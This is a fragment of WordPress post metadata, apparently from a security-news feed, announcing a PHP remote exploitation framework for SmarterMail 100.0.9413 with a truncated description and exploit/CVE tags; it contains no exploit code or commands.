{“lastseen”:”2026-02-20T23:00:38″,”description”:”This PHP code implements a fully automated remote exploitation framework targeting SmarterMail version 100.0.9413. It is designed to identify the service, determine the underlying operating…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-42054","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n